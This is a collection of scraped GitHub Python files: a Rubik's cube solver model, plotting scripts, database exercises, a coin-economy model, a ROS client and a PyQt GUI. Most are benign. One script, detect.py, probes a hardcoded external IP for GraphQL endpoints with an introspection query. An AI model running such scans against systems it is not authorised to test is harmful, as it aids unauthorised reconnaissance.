+{"seq_id":"23764795140","text":"import random\nimport sys\nimport time\nimport sys\n\nMOVES = {\n \"U\": [2, 0, 3, 1, 20, 21, 6, 7, 4, 5, 10, 11, 12, 13, 14, 15, 8, 9, 18, 19, 16, 17, 22, 23],\n \"U'\": [1, 3, 0, 2, 8, 9, 6, 7, 16, 17, 10, 11, 12, 13, 14, 15, 20, 21, 18, 19, 4, 5, 22, 23],\n \"R\": [0, 9, 2, 11, 6, 4, 7, 5, 8, 13, 10, 15, 12, 22, 14, 20, 16, 17, 18, 19, 3, 21, 1, 23],\n \"R'\": [0, 22, 2, 20, 5, 7, 4, 6, 8, 1, 10, 3, 12, 9, 14, 11, 16, 17, 18, 19, 15, 21, 13, 23],\n \"F\": [0, 1, 19, 17, 2, 5, 3, 7, 10, 8, 11, 9, 6, 4, 14, 15, 16, 12, 18, 13, 20, 21, 22, 23],\n \"F'\": [0, 1, 4, 6, 13, 5, 12, 7, 9, 11, 8, 10, 17, 19, 14, 15, 16, 3, 18, 2, 20, 21, 22, 23],\n \"D\": [0, 1, 2, 3, 4, 5, 10, 11, 8, 9, 18, 19, 14, 12, 15, 13, 16, 17, 22, 23, 20, 21, 6, 7],\n \"D'\": [0, 1, 2, 3, 4, 5, 22, 23, 8, 9, 6, 7, 13, 15, 12, 14, 16, 17, 10, 11, 20, 21, 18, 19],\n \"L\": [23, 1, 21, 3, 4, 5, 6, 7, 0, 9, 2, 11, 8, 13, 10, 15, 18, 16, 19, 17, 20, 14, 22, 12],\n \"L'\": [8, 1, 10, 3, 4, 5, 6, 7, 12, 9, 14, 11, 23, 13, 21, 15, 17, 19, 16, 18, 20, 2, 22, 0],\n \"B\": [5, 7, 2, 3, 4, 15, 6, 14, 8, 9, 10, 11, 12, 13, 16, 18, 1, 17, 0, 19, 22, 20, 23, 21],\n \"B'\": [18, 16, 2, 3, 4, 0, 6, 1, 8, 9, 10, 11, 12, 13, 7, 5, 14, 17, 15, 19, 21, 23, 20, 22],\n}\n\nclass Cube:\n\n def __init__(self, string=\"WWWW RRRR GGGG YYYY OOOO BBBB\"):\n self.stateString = string.replace(\" \", \"\")\n self.solvedStateString=\"WWWWRRRRGGGGYYYYOOOOBBBB\"\n self.solvedState=[i for i in self.solvedStateString]\n self.moves=[ \"U\", \"U'\", \"R\" , \"R'\", \"F\" , \"F'\", \"D\" , \"D'\", \"L\" , \"L'\", \"B\" , \"B'\"]\n self.currState = [i for i in self.stateString]\n self.fixedPair={0:\"U D'\",1:\"R L'\",2:\"D U'\",3:\"F B'\",4:\"L R'\",5:\"B F'\"}\n\n def createStateList(self,state):\n return [[char for char in state[i:i+4]] for i in range(0, len(''.join(state)), 4)]\n\n def norm(self,fixedPoint):\n self.applyMovesStr(self.fixedPair[fixedPoint])\n\n def normalize(self):\n for j in range(4):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(3)\n self.norm(1)\n for j in range(2):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == [\"G\",\"Y\",\"O\"]:\n return True\n self.norm(1)\n self.norm(1)\n return False\n\n def equals(self, cube=None):\n if cube==None:\n cube = self\n checkCube:Cube = self.clone(state=self.solvedState)\n for j in range(4):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(3)\n checkCube.norm(1)\n for j in range(2):\n for k in range(4):\n checkCube.norm(0)\n if cube.stateString == checkCube.stateString:\n return True\n checkCube.norm(1)\n checkCube.norm(1)\n return False\n\n def clone(self,state=None):\n if state==None:\n state=self.currState\n \n clone = ''\n for i in range(0, len(state), 4):\n clone+=''.join(state[i:i+4]) + \" \"\n\n return Cube(clone)\n\n # apply a move to a state\n def applyMove(self, move):\n newState = []\n if move in MOVES:\n for colorIdx in MOVES[move]:\n newState.append(self.currState[colorIdx])\n\n self.currState = newState\n self.stateString = ''.join(self.currState)\n\n # apply a string sequence of moves to a state\n def applyMovesStr(self, alg:str):\n seq = alg.split()\n for i in seq:\n self.applyMove(i)\n \n\n def isSolved(self):\n if self.isSolvedQuick():\n return self.equals()\n return False\n \n def isSolvedQuick(self):\n lst = 
self.createStateList(self.currState)\n for i in lst:\n if len(set(i)) != 1:\n return False\n return True\n \n def shuffle(self, n):\n moveHistory = []\n for _ in range(n):\n randomNumber = random.randint(0, len(self.moves)-1)\n move = self.moves[randomNumber]\n self.applyMove(move)\n moveHistory.append(move)\n print(\"Shuffled Move Seq:\",' '.join(moveHistory))\n\n\n def printHelper(self,cubes):\n printHelperList=[]\n remainder = len(cubes)%3\n if remainder != 0:\n printHelperList.append([self.createStateList(cube) for cube in cubes[-remainder:]])\n cubes = cubes[:-remainder]\n for idx, lstIdx in enumerate(range(0,len(cubes),3)):\n addLst = [self.createStateList(cube) for cube in cubes[lstIdx:lstIdx+3]]\n printHelperList.insert(idx,addLst)\n return printHelperList \n\n def print(self,cubes = None):\n if cubes==None:\n listCubes = [[self.createStateList(self.currState)]]\n else:\n newLst = []\n listCubes = self.printHelper(cubes)\n print(end=\"\\n\")\n # print(\"-\"*13+\"-\"*14*(len(listCubes[0])-1)+\"|\")\n for idxLst, lst in enumerate(listCubes):\n length = len(lst)\n for idx in range(length):\n print(f\" {lst[idx][0][0]}{lst[idx][0][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][0][2]}{lst[idx][0][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][0]}{lst[idx][4][1]} {lst[idx][2][0]}{lst[idx][2][1]} {lst[idx][1][0]}{lst[idx][1][1]} {lst[idx][5][0]}{lst[idx][5][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][4][2]}{lst[idx][4][3]} {lst[idx][2][2]}{lst[idx][2][3]} {lst[idx][1][2]}{lst[idx][1][3]} {lst[idx][5][2]}{lst[idx][5][3]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][0]}{lst[idx][3][1]}\",end=\" \")\n print(end=\"\\n\")\n for idx in range(length):\n print(f\" {lst[idx][3][2]}{lst[idx][3][3]}\",end=\" \")\n print(end=\"\\n\\n\")\n # if length > 1:\n # for idx in range(length-1):\n # if idxLst is not len(listCubes)-1 and idx >= len(listCubes[idxLst+1]):\n # print(\"-\"*13,end=\"-\")\n # else:\n # print(\"-\"*13,end=\"+\")\n # print(\"-\"*13+\"|\")","repo_name":"satwikShresth/Rubiks_2x2x2_solver","sub_path":"Cube.py","file_name":"Cube.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1451850326","text":"import sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport jieba\n\ndef fenci(filepath):\n f=open(filepath,\"r\")\n fn=open(\".\"+filepath,'a+')\n for line in f.readlines():\n seg_list = jieba.cut(line, cut_all=False)\n s= \"/ \".join(seg_list)\n fn.write(s)\n fn.close()\n f.close()\n print('end')\n\n\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_moved(self, event):\n if event.is_directory:\n print(\"directory moved from {0} to {1}\".format(event.src_path,event.dest_path))\n else:\n print(\"file moved from {0} to {1}\".format(event.src_path,event.dest_path))\n\n def on_created(self, event):\n if event.is_directory:\n print(\"directory created:{0}\".format(event.src_path))\n else:\n fenci(event.src_path)\n print(\"file created:{0}\".format(event.src_path))\n\n def on_deleted(self, event):\n if event.is_directory:\n print(\"directory deleted:{0}\".format(event.src_path))\n else:\n print(\"file deleted:{0}\".format(event.src_path))\n\n def on_modified(self, event):\n if event.is_directory:\n print(\"directory modified:{0}\".format(event.src_path))\n else:\n print(\"file modified:{0}\".format(event.src_path))\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = '.'\n event_handler = FileEventHandler()\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","repo_name":"SizzleWang/AscEndS","sub_path":"watchdog.py","file_name":"watchdog.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27470418028","text":"# Cezary Świtała\n# Kod użyty do generowania wykresów\n# pojawiających się w sprawozdaniu.\n\nfrom fisher import * # import własnych metod przydatnych przy wyliczaniu wartośći \n# funkcji gęstości rozkładu fishera\nimport math\nimport numpy\nimport matplotlib.pyplot as pyplot\n\ndef map_list(f, x): \n return list(map(f,x))\n\nx = numpy.linspace(0.001,4,num=200)\n\nfisher_1_1 = get_fisher_distr_density_function(1,1)\nfisher_2_1 = get_fisher_distr_density_function(2,1)\nfisher_4_1 = get_fisher_distr_density_function(4,1)\nfisher_4_2 = get_fisher_distr_density_function(4,2)\nfisher_4_4 = get_fisher_distr_density_function(4,4)\nfisher_6_4 = get_fisher_distr_density_function(6,4)\n\npyplot.plot(x, map_list(fisher_1_1, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1.5])\npyplot.legend()\npyplot.show()\npyplot.clf()\n\nfisher_1_1_cumulative = get_cumulative_fisher_distr(1,1,13);\nfisher_2_1_cumulative = get_cumulative_fisher_distr(2,1);\nfisher_4_1_cumulative = get_cumulative_fisher_distr(4,1);\nfisher_4_2_cumulative = get_cumulative_fisher_distr(4,2);\nfisher_4_4_cumulative = get_cumulative_fisher_distr(4,4);\nfisher_6_4_cumulative = get_cumulative_fisher_distr(6,4);\n\npyplot.plot(x, map_list(fisher_1_1_cumulative, x), label=\"m=1,n=1\")\npyplot.plot(x, map_list(fisher_2_1_cumulative, x), label=\"m=2,n=1\", color=\"red\")\npyplot.plot(x, map_list(fisher_4_1_cumulative, x), label=\"m=4,n=1\", color=\"black\")\npyplot.plot(x, map_list(fisher_4_2_cumulative, x), label=\"m=4,n=2\", color=\"green\")\npyplot.plot(x, map_list(fisher_4_4_cumulative, x), label=\"m=4,n=4\", color=\"orange\")\npyplot.plot(x, map_list(fisher_6_4_cumulative, x), label=\"m=6,n=4\", color=\"purple\")\npyplot.axis([0,4,0,1])\npyplot.legend()\npyplot.show()","repo_name":"MusicFreak456/Uniwroc","sub_path":"SemestrIV/RPiS/Pracownia/1/charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36889730166","text":"#!/usr/bin/env python3.7\n\nimport zoo_diversity_analysis\n\nimport re,glob,argparse\n\nparser = argparse.ArgumentParser(description=\"Process a shorah read file to filter and calculate the average number of polymorphic sites\\n\")\nessentialArgs = parser.add_argument_group('Files', 'Required arguments')\nessentialArgs.add_argument('-i','--input',metavar='input',required=True,type=str,dest='shorah_input',help=\"The reads.fas output file from ShoRAH\")\nessentialArgs.add_argument('-o','--output',metavar='output',required=True,type=str,dest='output_file',help=\"The file to print the results to\")\n#essentialArgs.add_argument('-r','--reference',metavar='reference',required=True,type=str,dest='reference_file',help=\"The file containing the reference sequence used in ShoRAH\")\nnonEssentialArgs = parser.add_argument_group('Conditions','Optional arguments')\n\nnonEssentialArgs.add_argument('-l','--pipeline-shorah',metavar='shorah',required=False,type=bool,dest='shorah',help=\"A boolean to indicate if the input is from the shorah pipeline, by default this is False.\")\nnonEssentialArgs.add_argument('-d','--directory',metavar='directory',required=False,type=bool,dest='input_is_directory',help=\"A boolean to indicate if the input is a directory or not, by default this is False.\")\nnonEssentialArgs.add_argument('-c','--continuous-mismatches',metavar='continuous',required=False,type=int,dest='contiguous_filter',help=\"The number of consecutive mismatches after which a particular read should be dropped.\")\nnonEssentialArgs.add_argument('-C','--minimum-predicted-coverage',metavar='coverage',required=False,type=float,dest='coverage',help=\"The average number of expected read coverages for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-p','--minimum-sequence-posterior-probability',metavar='min_prob',required=False,type=float,dest='min_prob',help=\"The required posterior probability for the predicted local haplotypes.\")\nnonEssentialArgs.add_argument('-f','--identity-filter',metavar='identity',required=False,type=float,dest='identity',help=\"The required number of matches for a read to be included.\")\nnonEssentialArgs.add_argument('-M','--mega_output',metavar='MEGA',required=False,type=str,dest='MEGA',help=\"A prefix for outputing reads in short local alignments for subsequent analysis.\")\n# NOTE the following two arguments are dealt with here\nnonEssentialArgs.add_argument('-s','--input-files-suffix',metavar='input_suffix',required=False,type=str,dest='input_suffix',help=\"The suffix, or extension for the files that are to be used as input, by default .fas.\")\nnonEssentialArgs.add_argument('-O','--merge-output',metavar='merge_output',required=False,type=bool,dest='merge_output',help=\"A boolean to indicate whether the output should be merged or not, either True or False (default).\")\nnonEssentialArgs.add_argument('-w','--window-length',metavar='window_length',required=False,type=int,dest='window_length',help=\"The length of the windows to be used (by default 66).\")\nnonEssentialArgs.add_argument('-W','--wattersons-statistic',metavar='wattersons_statistic',required=False,type=bool,dest='wattersons_statistic',help=\"A boolean to indicate whether to use wattersons theta (True), or pi (if -W is not provided, default)\")\nnonEssentialArgs.add_argument('-N','--minimum-no-haplotypes',metavar='minimum_haplotypes',required=False,type=int,dest='minimum_haplotypes',help=\"The minimum required number of haplotypes for the diversity analysis to ve 
performed (default 2)\")\n\narguments = parser.parse_args()\n\n# use the input_is_directory argument to either find the files, or to use the input argument directly\n\nif arguments.input_suffix is None:\n arguments.input_suffix = \".fas\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.input_is_directory is None:\n arguments.input_is_directory = False\nif arguments.shorah is None:\n arguments.shorah = False\nif arguments.wattersons_statistic is None:\n arguments.wattersons_statistic = False\n\nif arguments.minimum_haplotypes is None:\n arguments.minimum_haplotypes = 2\n\n\nif arguments.contiguous_filter is None:\n arguments.contiguous_filter = 10\nif arguments.min_prob is None:\n arguments.min_prob = 0.95\nif arguments.identity is None:\n arguments.identity = 0.95\nif arguments.coverage is None:\n arguments.coverage = 0\nif arguments.input_suffix is None:\n arguments.input_suffix = \"\"\nif arguments.merge_output is None:\n arguments.merge_output = False\nif arguments.window_length is None:\n arguments.window_length = 66\n\n\n\n\nif arguments.input_is_directory:\n file_list = glob.glob(arguments.shorah_input + \"/*\" + arguments.input_suffix)\n for aFile in file_list:\n if arguments.merge_output:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n else:\n exp = re.compile(r\".*/(.*)\\.\\w+$\")\n excludingExtension = re.match(exp,aFile)\n theFile = excludingExtension.group(1) + arguments.output_file\n output = open(theFile,\"w\")\n zoo_diversity_analysis.main(aFile,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\nelse:\n output = open(arguments.output_file,\"a\")\n zoo_diversity_analysis.main(arguments.shorah_input,output,arguments.contiguous_filter,arguments.identity,arguments.MEGA,arguments.window_length,arguments.wattersons_statistic,arguments.coverage,arguments.min_prob,arguments.minimum_haplotypes,arguments.shorah)\n","repo_name":"Zoophobus/diversity","sub_path":"zoo_diversity.py","file_name":"zoo_diversity.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28192233802","text":"from sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.base_engine import Model, RecordTimestampFields\nimport sqlalchemy as sa\n\nfrom models.db_models import User\nfrom models.enums import CoinValueChangeEnum\n\n\nclass ActionsEconomy(Model, RecordTimestampFields):\n __tablename__ = \"actions_economy\"\n\n id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)\n action_name = sa.Column(sa.String, nullable=False)\n description = sa.Column(sa.Text)\n change_type: CoinValueChangeEnum = sa.Column(sa.String, nullable=False)\n change_amount = sa.Column(sa.Integer, nullable=False, server_default=\"0\")\n\n @classmethod\n async def execute(\n cls,\n session: AsyncSession,\n action_name: str,\n coin_receiver_user_id: int,\n ):\n\n action = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n ).where(ActionsEconomy.action_name == action_name)\n )\n ).fetchone()\n\n user_coins = (\n (\n await session.execute(\n sa.select(User.coins).where(User.id == coin_receiver_user_id)\n )\n )\n .fetchone()\n .coins\n )\n\n if action.change_type == \"EARN\":\n new_coin_value = user_coins + action.change_amount\n sign = \"\"\n else:\n new_coin_value = user_coins - action.change_amount\n sign = \"-\"\n if new_coin_value < 0:\n raise cls.InsufficientCoins(\"Not enough coins\")\n\n await session.execute(\n sa.update(User)\n .where(User.id == coin_receiver_user_id)\n .values({User.coins: new_coin_value})\n )\n\n return {\n \"change_amount\": f\"{sign}{action.change_amount}\",\n \"coins\": new_coin_value,\n }\n\n @staticmethod\n async def verify_possibility(\n session: AsyncSession,\n user_id: int,\n action_names: list\n | None = None, # if there is no action names - then check all\n ):\n actions = (\n await session.execute(\n sa.select(\n ActionsEconomy.action_name,\n ActionsEconomy.change_type,\n ActionsEconomy.change_amount,\n )\n )\n ).fetchall()\n user_wallet = (\n (await session.execute(sa.select(User.coins).where(User.id == user_id)))\n .fetchone()\n .coins\n )\n if not action_names:\n action_names = [action.action_name for action in actions]\n always_true = {\n action.action_name: True\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.EARN,\n ]\n )\n }\n possibilities = {\n action.action_name: (user_wallet - action.change_amount) > 0\n for action in actions\n if all(\n [\n action.action_name in action_names,\n action.change_type == CoinValueChangeEnum.SPEND,\n ]\n )\n }\n return {**always_true, **possibilities}\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"models/db_models/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"26357661872","text":"#!/usr/bin/env python\nnum = int(input())\nheights = [0] + [int(x) for x in input().split()] + [0]\ncnt = 0\nup = heights[0] < heights[1]\nfor i in range(num + 1):\n if up and heights[i] > heights[i + 1]:\n cnt += 1\n up = False\n if not up and heights[i] < heights[i + 1]:\n # cnt += 1\n up = True\nprint(cnt)\n","repo_name":"aLagoG/kygerand","sub_path":"rpc/1/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"18443719686","text":"#!/usr/bin/python3\n\"\"\"This script adds the State object “Louisiana” to\nthe database hbtn_0e_6_usa\"\"\"\n\nimport sqlalchemy\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sys import argv\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n \"\"\"to be accessed directly for MetaData-specific operations.\"\"\"\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n argv[1], argv[2], argv[3]), pool_pre_ping=True)\n\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State(name='Louisiana')\n session.add(new_state)\n query = session.query(State).filter_by(name='Louisiana').first()\n print(new_state.id)\n session.commit()\n session.close()\n","repo_name":"EylenS/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"2696228253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 14:54:55 2022\r\n\r\n@author: Sam\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n#sediment flow parameters\r\nq0=0.22; a=1.1; \r\n#bed shape parameters\r\nb=0.2; k=2.0; eps=0.5; #bed porosity not given so I'll assume 0.5\r\n#space domain\r\nxdelta=0.1;\r\nstart=0.0; end=4.0;\r\nx=np.arange(start, end+xdelta,xdelta)\r\n#time domain\r\ntdelta=[0.05,0.1,0.15]\r\n#clear figures\r\nplt.cla(); plt.clf();\r\n#setup\r\nn=[];\r\nplt.style.use(\"dark_background\");\r\nfig, ax= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\n# initial conditions plot\r\nn.append(b*np.sin(k*x));\r\nax.plot(x,n[0],label=\"t=0\");\r\n# different time delta plots\r\nfor i in range(len(tdelta)):\r\n n.append( b*np.sin(k*x)-tdelta[i]*(a*b*k/eps)*np.cos(k*x) );\r\n ax.plot(x,n[i+1],label=\"$\\Delta t=$\"+str(tdelta[i]));\r\n# style of the plot\r\nax.set_xlabel(\"location (m)\");\r\nax.set_ylabel(\"bed elevation (m)\");\r\nax.legend();\r\nax.grid(True);\r\nplt.show();\r\n#now with a plot of the flow on top\r\nplt.style.use(\"default\");\r\nfig2, ax2= plt.subplots(figsize=[4.8, 3.6],dpi=300);\r\nax2.plot(x,n[0],label=\"$\\eta (x)$\",zorder=0);\r\ny_dummy=x*0;\r\nq=q0+a*n[0];\r\nax2.quiver(x,n[0],q,y_dummy,zorder=1);\r\n\r\n# style of the plot\r\nax2.set_xlabel(\"location (m)\");\r\nax2.set_ylabel(\"bed elevation (m)\");\r\nax2.set_title(\"flux $q_s$ on surface\");\r\nax2.legend();\r\nax2.grid(True);\r\nplt.show();","repo_name":"y05emite-sam/dep_mechanics","sub_path":"hw1/problem1.3.py","file_name":"problem1.3.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12633228072","text":"\"\"\"\nMedian of two sorted arrays\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nThe overall run time complexity should be O(log (m+n)).\n\n@Author: Venkat Rebba \n\"\"\"\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \n l1 = len(nums1)\n l2 = len(nums2)\n nums3 = []\n \n i, j, k = 0, 0, 0\n \n while True:\n \n if i>=l1 or j>=l2:\n break\n \n if nums1[i] >= nums2[j]:\n nums3.append(nums2[j])\n j += 1\n \n else:\n nums3.append(nums1[i])\n i += 1\n \n k += 1\n \n if l1-i > 0:\n nums3.extend(nums1[i:])\n \n if l2-j > 0:\n nums3.extend(nums2[j:])\n \n \n m = len(nums3)//2 \n med = nums3[m] if (len(nums3)%2 == 1) else (nums3[m-1] + nums3[m])/2\n return med\n \n \nn1 = [1,2,3]\nn2 = [2, 4, 5]\n\nsol = Solution()\nprint(sol.findMedianSortedArrays(n1, n2))\n ","repo_name":"venkatrebba/Leetcode_practice","sub_path":"meanOfTwoSortedArrays.py","file_name":"meanOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"42511827564","text":"#!/usr/bin/python3\n\"\"\"\nMy Safe Filter States Module\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nargv = sys.argv\nif argv.__len__() == 5:\n ALX_DB_DETAIL = {\n 'host': \"localhost\",\n 'port': 3306,\n 'user': argv[1],\n 'passwd': argv[2],\n 'db': argv[3]\n }\n search_n = argv[4]\n db = MySQLdb.connect(**ALX_DB_DETAIL)\n cursor = db.cursor()\n query = \"\"\"SELECT cities.name\n FROM cities\n JOIN states ON cities.state_id = states.id\n WHERE states.name = %s\n ORDER BY cities.id ASC;\"\"\"\n cursor.execute(query, (search_n,))\n records = cursor.fetchall()\n my_list = [x[0] for x in records]\n print(\", \".join(my_list))\n \"\"\" record_count = cursor.rowcount\n for i in range(0, record_count):\n if i == record_count-1:\n print(cursor.fetchone()[0])\n else:\n print(cursor.fetchone()[0], end=', ')\"\"\"\n cursor.close()\n db.close()\n","repo_name":"NiiAdjei-001/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"26398644087","text":"import json\r\nimport requests\r\nfrom urllib import parse\r\n\r\npaths = [\r\n \"\",\r\n \"/graphql\",\r\n \"/graphql/console\",\r\n \"graphql.php\",\r\n \"graphiql\",\r\n \"explorer\",\r\n \"altair\",\r\n \"/playground\"\r\n]\r\n\r\nquery = \"\"\"{\r\n __schema {\r\n types {\r\n name\r\n }\r\n }\r\n}\r\n\"\"\"\r\n\r\nfor path in paths:\r\n hostname = 'http://159.100.248.211'\r\n endpoint = parse.urljoin(hostname, path)\r\n try:\r\n print(f\"Attempt: {endpoint}\")\r\n response = requests.post(endpoint, json={'query': query}, timeout=0.1)\r\n except Exception:\r\n print(\"No GraphQL endpoint found\")\r\n else:\r\n if response.status_code == 200:\r\n json_data = json.loads(response.text)\r\n if json_data.get('data'):\r\n print(\"It is a GraphQL endpoint\",endpoint)\r\n","repo_name":"MarkDan101/graphdetect","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34501634182","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport rospy\nfrom beginner_tutorials.srv import *\n\ndef Celsius2Fahrenheit_client(x):\n rospy.wait_for_service('C2F')\n try:\n C2FF = rospy.ServiceProxy('C2F', Celsius2Fahrenheit)\n return C2FF(x)\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n\ndef usage():\n return \"%s [x]\"% float(sys.argv[0])\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n x = float(sys.argv[1])\n Celsius2Fahrenheit_client(x)\n else:\n print(usage())\n sys.exit(1)\n print(\"Requesting %s\"%(x))\n var=x*1.8+32\n print(str(x)+\" Celsius degrees is \" + str(var) + \" Fahrenheit degrees\")\n \n","repo_name":"I1C/TemperatureConverterClientServer","sub_path":"scripts/Celsius2Fahrenheit_client.py","file_name":"Celsius2Fahrenheit_client.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"33610794945","text":"from styles import *\r\nfrom ventanaViaje import *\r\nfrom ventanaEmpresa import *\r\nfrom ventanaChoferes import *\r\n\r\nclass VentanaPrincipal(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"Remiseria\")\r\n self.mainLayout = QVBoxLayout()\r\n \r\n self.titulo = Text(string=\"Bienvenido a Empresa de Jhoskin\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.titulo)\r\n \r\n self.botonViaje = Button(string=\"Nuevo Viaje\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonViaje)\r\n self.botonViaje.clicked.connect(self.abrirVentanaViaje)\r\n \r\n self.botonEmpresa = Button(string=\"Empresa\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonEmpresa)\r\n self.botonEmpresa.clicked.connect(self.abrirVentanaEmpresa)\r\n \r\n self.botonChoferes = Button(string=\"Choferes\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonChoferes)\r\n self.botonChoferes.clicked.connect(self.abrirVentanaChoferes)\r\n\r\n centralWidget = QWidget()\r\n centralWidget.setLayout(self.mainLayout)\r\n self.setCentralWidget(centralWidget)\r\n \r\n def abrirVentanaViaje(self):\r\n self.windowViaje = WindowViaje()\r\n self.windowViaje.show()\r\n\r\n def abrirVentanaEmpresa(self):\r\n self.windowEmpresa = WindowEmpresa()\r\n self.windowEmpresa.show()\r\n \r\n def abrirVentanaChoferes(self):\r\n self.windowChoferes = WindowChoferes()\r\n self.windowChoferes.show()\r\n \r\nif __name__ == '__main__':\r\n app = QApplication()\r\n window = VentanaPrincipal()\r\n window.setStyleSheet(\"background-color: darkgray\")\r\n window.show()\r\n app.exec()","repo_name":"pablokan/side","sub_path":"efis/B/nine/proyecto/ventanaPrincipal.py","file_name":"ventanaPrincipal.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
